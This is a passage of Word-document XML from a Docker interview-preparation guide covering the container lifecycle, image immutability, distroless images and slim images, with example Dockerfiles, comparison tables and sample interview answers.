        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>7. Removed</w:t>
        <w:br/>
        <w:t>Container is permanently deleted.</w:t>
        <w:br/>
        <w:t>docker rm web</w:t>
        <w:br/>
        <w:t>After removal:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Container metadata is deleted.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Writable layer is deleted.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Attached volumes remain unless explicitly removed.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Common Lifecycle Commands</w:t>
        <w:br/>
        <w:t>Action</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Command</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Create</w:t>
        <w:br/>
        <w:tab/>
        <w:t>docker create</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Run</w:t>
        <w:br/>
        <w:tab/>
        <w:t>docker run</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Start</w:t>
        <w:br/>
        <w:tab/>
        <w:t>docker start</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Stop</w:t>
        <w:br/>
        <w:tab/>
        <w:t>docker stop</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Restart</w:t>
        <w:br/>
        <w:tab/>
        <w:t>docker restart</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Pause</w:t>
        <w:br/>
        <w:tab/>
        <w:t>docker pause</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Unpause</w:t>
        <w:br/>
        <w:tab/>
        <w:t>docker unpause</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Remove</w:t>
        <w:br/>
        <w:tab/>
        <w:t>docker rm</w:t>
        <w:br/>
        <w:tab/>
        <w:t>List Running</w:t>
        <w:br/>
        <w:tab/>
        <w:t>docker ps</w:t>
        <w:br/>
        <w:tab/>
        <w:t>List All</w:t>
        <w:br/>
        <w:tab/>
        <w:t>docker ps -a</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Container State Example</w:t>
        <w:br/>
        <w:t>Check container status:</w:t>
        <w:br/>
        <w:t>docker inspect web</w:t>
        <w:br/>
        <w:t>Look for:</w:t>
        <w:br/>
        <w:t>{</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "State": {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "Status": "running"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>Possible statuses:</w:t>
        <w:br/>
        <w:t>created</w:t>
        <w:br/>
        <w:t>running</w:t>
        <w:br/>
        <w:t>paused</w:t>
        <w:br/>
        <w:t>restarting</w:t>
        <w:br/>
        <w:t>exited</w:t>
        <w:br/>
        <w:t>dead</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Container Restart Policies</w:t>
        <w:br/>
        <w:t>Automatically restart containers:</w:t>
        <w:br/>
        <w:t>docker run -d \</w:t>
        <w:br/>
        <w:t>--restart unless-stopped \</w:t>
        <w:br/>
        <w:t>nginx</w:t>
        <w:br/>
        <w:t>Options:</w:t>
        <w:br/>
        <w:t>Policy</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Description</w:t>
        <w:br/>
        <w:tab/>
        <w:t>no</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Default</w:t>
        <w:br/>
        <w:tab/>
        <w:t>always</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Always restart</w:t>
        <w:br/>
        <w:tab/>
        <w:t>on-failure</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Restart only on failure</w:t>
        <w:br/>
        <w:tab/>
        <w:t>unless-stopped</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Restart unless manually stopped</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Kubernetes Perspective</w:t>
        <w:br/>
        <w:t>Container lifecycle inside Kubernetes:</w:t>
        <w:br/>
        <w:t>Image</w:t>
        <w:br/>
        <w:t xml:space="preserve">  │</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ▼</w:t>
        <w:br/>
        <w:t>Pod Created</w:t>
        <w:br/>
        <w:t xml:space="preserve">  │</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ▼</w:t>
        <w:br/>
        <w:t>Container Running</w:t>
        <w:br/>
        <w:t xml:space="preserve">  │</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ▼</w:t>
        <w:br/>
        <w:t>Container Failure</w:t>
        <w:br/>
        <w:t xml:space="preserve">  │</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ▼</w:t>
        <w:br/>
        <w:t>Kubernetes Restarts Container</w:t>
        <w:br/>
        <w:t>Kubernetes continuously maintains the desired state.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (7+ Years Experience)</w:t>
        <w:br/>
        <w:t>The container lifecycle consists of several states including created, running, paused, stopped, and removed. A container is instantiated from an image, enters the created state, and transitions to running when its main process starts. Containers can be paused and resumed, stopped gracefully, restarted, or permanently removed. Docker provides lifecycle management commands such as run, start, stop, restart, and rm. In production environments, restart policies and orchestration platforms like Kubernetes are used to automate lifecycle management and ensure application availability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q371. What is image immutability?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: What is Image Immutability?</w:t>
        <w:br/>
        <w:t>Image immutability means that once a container image is built and tagged, it should never be modified. If changes are required, a new image is built and deployed instead of updating the existing image.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Concept</w:t>
        <w:br/>
        <w:t>Immutable approach:</w:t>
        <w:br/>
        <w:t>Version 1 Image</w:t>
        <w:br/>
        <w:t xml:space="preserve">      │</w:t>
        <w:br/>
        <w:t>Change Required</w:t>
        <w:br/>
        <w:t xml:space="preserve">      │</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ▼</w:t>
        <w:br/>
        <w:t>Build Version 2 Image</w:t>
        <w:br/>
        <w:t xml:space="preserve">      │</w:t>
        <w:br/>
        <w:t>Deploy New Image</w:t>
        <w:br/>
        <w:t>Not:</w:t>
        <w:br/>
        <w:t>Version 1 Image</w:t>
        <w:br/>
        <w:t xml:space="preserve">      │</w:t>
        <w:br/>
        <w:t>Modify Existing Image ❌</w:t>
        <w:br/>
        <w:t xml:space="preserve">      │</w:t>
        <w:br/>
        <w:t>Deploy</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why is Image Immutability Important?</w:t>
        <w:br/>
        <w:t>1. Consistency</w:t>
        <w:br/>
        <w:t>The same image runs everywhere:</w:t>
        <w:br/>
        <w:t>Development</w:t>
        <w:br/>
        <w:t xml:space="preserve">     │</w:t>
        <w:br/>
        <w:t>Testing</w:t>
        <w:br/>
        <w:t xml:space="preserve">     │</w:t>
        <w:br/>
        <w:t>Production</w:t>
        <w:br/>
        <w:t>All environments use the exact same image.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Predictability</w:t>
        <w:br/>
        <w:t>If an image works in testing, the same image will work in production.</w:t>
        <w:br/>
        <w:t>myapp:v1.2.0</w:t>
        <w:br/>
        <w:t>The contents never change.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Easy Rollbacks</w:t>
        <w:br/>
        <w:t>v1.0 → v1.1 → v1.2</w:t>
        <w:br/>
        <w:t xml:space="preserve">                │</w:t>
        <w:br/>
        <w:t>Issue Found</w:t>
        <w:br/>
        <w:t xml:space="preserve">                ▼</w:t>
        <w:br/>
        <w:t>Rollback to v1.1</w:t>
        <w:br/>
        <w:t>Simply deploy the previous image version.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>4. Better Security</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Easier vulnerability tracking</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Easier auditing</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Prevents unauthorized modifications</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example</w:t>
        <w:br/>
        <w:t>Build image:</w:t>
        <w:br/>
        <w:t>docker build -t myapp:v1 .</w:t>
        <w:br/>
        <w:t>Deploy:</w:t>
        <w:br/>
        <w:t>docker run myapp:v1</w:t>
        <w:br/>
        <w:t>Later, application changes:</w:t>
        <w:br/>
        <w:t>docker build -t myapp:v2 .</w:t>
        <w:br/>
        <w:t>Deploy:</w:t>
        <w:br/>
        <w:t>docker run myapp:v2</w:t>
        <w:br/>
        <w:t>Never modify myapp:v1.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Immutability in CI/CD</w:t>
        <w:br/>
        <w:t>Code Commit</w:t>
        <w:br/>
        <w:t xml:space="preserve">     │</w:t>
        <w:br/>
        <w:t>Build Image</w:t>
        <w:br/>
        <w:t xml:space="preserve">     │</w:t>
        <w:br/>
        <w:t>Tag Image</w:t>
        <w:br/>
        <w:t xml:space="preserve">     │</w:t>
        <w:br/>
        <w:t>Push Registry</w:t>
        <w:br/>
        <w:t xml:space="preserve">     │</w:t>
        <w:br/>
        <w:t>Deploy</w:t>
        <w:br/>
        <w:t>Every build generates a new immutable artifact.</w:t>
        <w:br/>
        <w:t>Example tags:</w:t>
        <w:br/>
        <w:t>myapp:1.0.0</w:t>
        <w:br/>
        <w:t>myapp:1.0.1</w:t>
        <w:br/>
        <w:t>myapp:1.1.0</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Avoid Using</w:t>
        <w:br/>
        <w:t>latest</w:t>
        <w:br/>
        <w:t>Bad:</w:t>
        <w:br/>
        <w:t>myapp:latest</w:t>
        <w:br/>
        <w:t>Reason:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Tag contents may change.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Difficult to reproduce deployments.</w:t>
        <w:br/>
        <w:t>Preferred:</w:t>
        <w:br/>
        <w:t>myapp:1.4.2</w:t>
        <w:br/>
        <w:t>myapp:20260530</w:t>
        <w:br/>
        <w:t>myapp:a1b2c3d</w:t>
        <w:br/>
        <w:t>Often teams use Git commit hashes:</w:t>
        <w:br/>
        <w:t>myapp:8f3c2d1</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Kubernetes and Immutability</w:t>
        <w:br/>
        <w:t>Deployment:</w:t>
        <w:br/>
        <w:t>image: myapp:1.4.2</w:t>
        <w:br/>
        <w:t>New release:</w:t>
        <w:br/>
        <w:t>image: myapp:1.4.3</w:t>
        <w:br/>
        <w:t>Kubernetes performs a rolling update using the new immutable image.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Benefits</w:t>
        <w:br/>
        <w:t>✅ Consistent deployments</w:t>
        <w:br/>
        <w:t>✅ Easier rollbacks</w:t>
        <w:br/>
        <w:t>✅ Better auditability</w:t>
        <w:br/>
        <w:t>✅ Improved security</w:t>
        <w:br/>
        <w:t>✅ Reproducible environments</w:t>
        <w:br/>
        <w:t>✅ Reliable CI/CD pipelines</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (7+ Years Experience)</w:t>
        <w:br/>
        <w:t>Image immutability is the principle that a container image, once built and published, should never be modified. Any change to the application, configuration, or dependencies requires building a new image with a new version tag. This ensures consistency across environments, simplifies rollbacks, improves traceability, and supports secure, reproducible deployments. In modern DevOps and Kubernetes environments, immutable images are a core best practice and are typically versioned using semantic versions, build numbers, or Git commit hashes rather than mutable tags like latest.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q372. Explain distroless images.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: What are Distroless Images?</w:t>
        <w:br/>
        <w:t>Distroless images are minimal container images that contain only the application and its runtime dependencies, without a full Linux distribution.</w:t>
        <w:br/>
        <w:t>They typically exclude:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Shell (bash, sh)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Package managers (apt, yum)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Debugging tools</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Unnecessary system utilities</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Traditional Image vs Distroless Image</w:t>
        <w:br/>
        <w:t>Traditional Image</w:t>
        <w:br/>
        <w:t>Application</w:t>
        <w:br/>
        <w:t>Runtime</w:t>
        <w:br/>
        <w:t>Shell</w:t>
        <w:br/>
        <w:t>Package Manager</w:t>
        <w:br/>
        <w:t>System Utilities</w:t>
        <w:br/>
        <w:t>Libraries</w:t>
        <w:br/>
        <w:t>Distroless Image</w:t>
        <w:br/>
        <w:t>Application</w:t>
        <w:br/>
        <w:t>Runtime</w:t>
        <w:br/>
        <w:t>Required Libraries</w:t>
        <w:br/>
        <w:t>Everything else is removed.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why Use Distroless Images?</w:t>
        <w:br/>
        <w:t>1. Smaller Attack Surface</w:t>
        <w:br/>
        <w:t>Fewer binaries mean fewer vulnerabilities.</w:t>
        <w:br/>
        <w:t>No bash</w:t>
        <w:br/>
        <w:t>No apt</w:t>
        <w:br/>
        <w:t>No yum</w:t>
        <w:br/>
        <w:t>No curl</w:t>
        <w:br/>
        <w:t>Attackers have fewer tools available if a container is compromised.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Improved Security</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>Traditional image:</w:t>
        <w:br/>
        <w:t>docker exec -it container bash</w:t>
        <w:br/>
        <w:t>Distroless image:</w:t>
        <w:br/>
        <w:t>bash not found</w:t>
        <w:br/>
        <w:t>Interactive shell access is typically unavailable.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Smaller Image Size</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>Ubuntu-based App   : ~200 MB+</w:t>
        <w:br/>
        <w:t>Distroless App     : ~30–50 MB</w:t>
        <w:br/>
        <w:t>Benefits:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Faster downloads</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Faster deployments</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Reduced storage costs</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example Dockerfile</w:t>
        <w:br/>
        <w:t>Traditional:</w:t>
        <w:br/>
        <w:t>FROM openjdk:21</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>COPY app.jar app.jar</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>CMD ["java","-jar","app.jar"]</w:t>
        <w:br/>
        <w:t>Distroless:</w:t>
        <w:br/>
        <w:t>FROM gcr.io/distroless/java21</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>COPY app.jar app.jar</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>CMD ["app.jar"]</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Multi-Stage Build with Distroless</w:t>
        <w:br/>
        <w:t>Common pattern:</w:t>
        <w:br/>
        <w:t>FROM maven:3.9-eclipse-temurin-21 AS builder</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>COPY . .</w:t>
        <w:br/>
        <w:t>RUN mvn package</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>FROM gcr.io/distroless/java21</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>COPY --from=builder target/app.jar /app.jar</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>CMD ["app.jar"]</w:t>
        <w:br/>
        <w:t>Build tools stay in the builder image and do not end up in production.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Popular Distroless Images</w:t>
        <w:br/>
        <w:t>Maintained by  Google Distroless Project</w:t>
        <w:br/>
        <w:t>Examples:</w:t>
        <w:br/>
        <w:t>distroless/static</w:t>
        <w:br/>
        <w:t>distroless/base</w:t>
        <w:br/>
        <w:t>distroless/java21</w:t>
        <w:br/>
        <w:t>distroless/nodejs</w:t>
        <w:br/>
        <w:t>distroless/python3</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Challenges</w:t>
        <w:br/>
        <w:t>Debugging</w:t>
        <w:br/>
        <w:t>No shell:</w:t>
        <w:br/>
        <w:t>docker exec -it app bash</w:t>
        <w:br/>
        <w:t>Fails.</w:t>
        <w:br/>
        <w:t>Instead:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Use logs</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Use sidecar/debug containers</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Use Kubernetes ephemeral containers</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Learning Curve</w:t>
        <w:br/>
        <w:t>Teams accustomed to shell-based debugging may need new operational practices.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Distroless vs Alpine</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Distroless</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Alpine</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Shell Available</w:t>
        <w:br/>
        <w:tab/>
        <w:t>No</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Yes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Package Manager</w:t>
        <w:br/>
        <w:tab/>
        <w:t>No</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Yes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Attack Surface</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Smaller</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Small</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Debugging</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Harder</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Easier</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Security</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Higher</w:t>
        <w:br/>
        <w:tab/>
        <w:t>High</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Image Size</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Very Small</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Small</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Best Use Cases</w:t>
        <w:br/>
        <w:t>✅ Production applications</w:t>
        <w:br/>
        <w:t>✅ Microservices</w:t>
        <w:br/>
        <w:t>✅ Kubernetes workloads</w:t>
        <w:br/>
        <w:t>✅ Security-focused environments</w:t>
        <w:br/>
        <w:t>✅ CI/CD pipelines following least-privilege principles</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (7+ Years Experience)</w:t>
        <w:br/>
        <w:t>Distroless images are minimal container images that contain only the application and the runtime dependencies required to execute it, without including a full Linux distribution, shell, package manager, or debugging utilities. By removing unnecessary components, distroless images significantly reduce image size and attack surface, improving security and deployment efficiency. They are commonly used in production Kubernetes environments and are often combined with multi-stage Docker builds to separate build-time dependencies from runtime artifacts. The primary trade-off is reduced debugging capability, which typically requires alternative troubleshooting approaches such as logs, sidecar containers, or ephemeral debug containers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q373. What are slim images?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: What are Slim Images?</w:t>
        <w:br/>
        <w:t>Slim images are lightweight versions of standard container images that remove unnecessary packages, documentation, localization files, and development tools while retaining the components needed to run applications.</w:t>
        <w:br/>
        <w:t>They are smaller than regular images but usually contain more utilities than distroless images.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example</w:t>
        <w:br/>
        <w:t>Standard image:</w:t>
        <w:br/>
        <w:t>FROM python:3.12</w:t>
        <w:br/>
        <w:t>Slim image:</w:t>
        <w:br/>
        <w:t>FROM python:3.12-slim</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Standard vs Slim</w:t>
        <w:br/>
        <w:t>Standard Image</w:t>
        <w:br/>
        <w:t>├─ Runtime</w:t>
        <w:br/>
        <w:t>├─ Package Manager</w:t>
        <w:br/>
        <w:t>├─ Documentation</w:t>
        <w:br/>
        <w:t>├─ Development Tools</w:t>
        <w:br/>
        <w:t>├─ Extra Libraries</w:t>
        <w:br/>
        <w:t>└─ Utilities</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Slim Image</w:t>
        <w:br/>
        <w:t>├─ Runtime</w:t>
        <w:br/>
        <w:t>├─ Essential Libraries</w:t>
        <w:br/>
        <w:t>└─ Minimal Utilities</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why Use Slim Images?</w:t>
        <w:br/>
        <w:t>1. Smaller Size</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>python:3.12       ~900 MB+</w:t>
        <w:br/>
        <w:t>python:3.12-slim  ~150 MB+</w:t>
        <w:br/>
        <w:t>Benefits:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Faster image pulls</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Faster deployments</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Lower storage costs</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Reduced Attack Surface</w:t>
        <w:br/>
        <w:t>Fewer packages mean:</w:t>
        <w:br/>
        <w:t>Fewer Packages</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ↓</w:t>
        <w:br/>
        <w:t>Fewer Vulnerabilities</w:t>
        <w:br/>
        <w:t>Security scanners typically report fewer CVEs.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Better Performance in CI/CD</w:t>
        <w:br/>
        <w:t>Build</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ↓</w:t>
        <w:br/>
        <w:t>Push</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ↓</w:t>
        <w:br/>
        <w:t>Pull</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ↓</w:t>
        <w:br/>
        <w:t>Deploy</w:t>
        <w:br/>
        <w:t>Smaller images move through pipelines faster.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Common Slim Images</w:t>
        <w:br/>
        <w:t>Examples:</w:t>
        <w:br/>
        <w:t>python:3.12-slim</w:t>
        <w:br/>
        <w:t>node:24-slim</w:t>
        <w:br/>
        <w:t>openjdk:21-slim</w:t>
        <w:br/>
        <w:t>debian:bookworm-slim</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example Dockerfile</w:t>
        <w:br/>
        <w:t>Standard:</w:t>
        <w:br/>
        <w:t>FROM node:24</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>WORKDIR /app</w:t>
        <w:br/>
        <w:t>COPY . .</w:t>
        <w:br/>
        <w:t>RUN npm install</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>CMD ["npm","start"]</w:t>
        <w:br/>
        <w:t>Slim:</w:t>
        <w:br/>
        <w:t>FROM node:24-slim</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>WORKDIR /app</w:t>
        <w:br/>
        <w:t>COPY . .</w:t>
        <w:br/>
        <w:t>RUN npm install</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>CMD ["npm","start"]</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Slim vs Alpine vs Distroless</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Slim</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Alpine</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Distroless</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Image Size</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Small</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Very Small</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Smallest</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Shell Available</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Usually Yes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Yes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>No</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Package Manager</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Yes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Yes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>No</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Debugging</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Easy</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Easy</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Difficult</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Security</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Good</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Better</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Best</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Production Ready</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Yes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Yes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Yes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>When to Use Slim Images</w:t>
        <w:br/>
        <w:t>✅ Production applications</w:t>
        <w:br/>
        <w:t>✅ CI/CD pipelines</w:t>
        <w:br/>
        <w:t>✅ Microservices</w:t>
        <w:br/>
        <w:t>✅ Applications needing package managers or shell access</w:t>
        <w:br/>
        <w:t>Avoid if:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Maximum security is required → Distroless may be better.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Extremely small image size is required → Alpine or Distroless may be preferred.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Best Practice</w:t>
        <w:br/>
        <w:t>Combine slim images with multi-stage builds:</w:t>
        <w:br/>
        <w:t>FROM maven:3.9 AS builder</w:t>
        <w:br/>
        <w:t>RUN mvn package</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>FROM eclipse-temurin:21-jre-slim</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>COPY --from=builder target/app.jar app.jar</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>ENTRYPOINT ["java","-jar","app.jar"]</w:t>
        <w:br/>
        <w:t>This produces smaller and more secure runtime images.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (7+ Years Experience)</w:t>
        <w:br/>
